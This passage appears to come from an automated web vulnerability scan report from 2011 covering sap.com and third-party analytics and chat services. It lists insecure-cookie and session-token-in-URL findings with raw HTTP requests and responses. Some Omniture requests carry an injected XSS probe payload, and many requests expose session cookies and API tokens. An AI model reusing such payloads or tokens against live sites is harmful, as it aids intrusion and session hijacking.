Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:39 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
8.18. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:44 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:43 GMT
Content-Length: 12160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
8.19. https://www.sap.com/profile/warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
8.20. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"
8.21. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
8.22. https://www.sme.sap.com/irj/sme/cpslogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/plain
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
Location: https://www.sme.sap.com:443/irj/sme/logon
Content-Length: 0
Date: Sat, 15 Oct 2011 14:32:52 GMT
Connection: keep-alive
Set-Cookie: saplb_*=(J2EE3417600)3417650; Version=1; Path=/; HttpOnly; secure
Set-Cookie: Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; Domain=.sme.sap.com; Expires=Thu, 02-Nov-2079 17:46:59 GMT; Path=/; secure
Set-Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; Domain=www.sme.sap.com; Path=/irj/sme; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; Version=1; Path=/; HttpOnly; secure
Set-Cookie: SDNSTATE=526651564.14340.0000; path=/

9. Session token in URL  previous  next
There are 10 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://nmp.newsgator.com/NGBuzz/buzz.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Fri, 07 Oct 2011 20:13:12 GMT
ETag: 634536151927656250
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 3764
Cache-Control: public, max-age=564
Date: Sat, 15 Oct 2011 14:24:28 GMT
Connection: close

try{var buzzTemplate_215423="\t{stringify CustomFooter}\n\t\t<div class=\"footerClass\">\n\t\t\t<!--- Style up your footer --->\n\t\t\t<a style=\"cursor: pointer;\" href=\"javascript:void(0)\" onclick
...[SNIP]...
9.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=05672&profile.geo_gmt_offset=-400&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=vt&profile.geo_region_code=46&profile.geo_city=stowe&profile.geo_city_code=7029&mbox=omniTargetingInfo&mboxId=0&mboxTime=1318668441221&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:03 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 2562
Date: Sat, 15 Oct 2011 13:47:02 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('omniTargetingInfo',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...
9.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318686440062-338730&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318668457851&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&eVar17=7%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318686440062-338730; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631777052-118529.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:20 GMT; Path=/m2/omnituremarketing
Content-Length: 220
Date: Sat, 15 Oct 2011 13:47:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318631777052-118529.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
9.4. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318686446356-232585&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318668446491&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss%2528%2529%7Balert%2528%2527XSS%2527%2529%253B%7D&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 29-Oct-2011 13:47:08 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1042
Date: Sat, 15 Oct 2011 13:47:08 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-st
...[SNIP]...
9.5. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/?&visitor=546022977410&msessionkey=449600187523043155&site=37021986&cmd=mTagUrl&lpCallId=956909634864-544208121774&protV=20&lpjson=1&SV%21impression-query-name=voice-sales-sap-general-us-en-1&SV%21impression-query-room=voice-sales-sap-general-us-en-1&id=4277119246&info=button-impression%3Avoice-sales-sap-general-us-en-1%28SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP%29&waitForVisitor=true&d=1318688497247&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:21:18 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"956909634864-544208121774","lpCallConfirm":"","lpData":[{"result":56}]}});
9.6. http://sales.liveperson.net/hc/37021986/cmd/url/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/37021986/cmd/url/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/cmd/url/?site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!click-query-name=voice-sales-sap-general-us-en-1&SV!click-query-room=voice-sales-sap-general-us-en-1&SV!click-query-state=Available&SV!click-query-channel=voice&page=http%3A//sales.liveperson.net/hc/37021986/%3Fcmd%3Dfile%26file%3DvisitorWantsToTalk%26site%3D37021986%26visitor%3D546022977410%26msessionkey%3D449600187523043155%26SV%21EngageRoom%3Dsales-sap-general-us-en%26SV%21chat-button-name%3Dvoice-sales-sap-general-us-en-1%26SV%21chat-button-room%3Dvoice-sales-sap-general-us-en-1%26referrer%3D%28button%2520dynamic-button%3Avoice-sales-sap-general-us-en-1%28SAP%2520Business%2520Management%2520Software%2520Solutions%252C%2520Applications%2520and%2520Services%2520%257C%2520SAP%29%29%2520http%253A//www.sap.com/index.epx&id=8140355572&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1318690564635 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
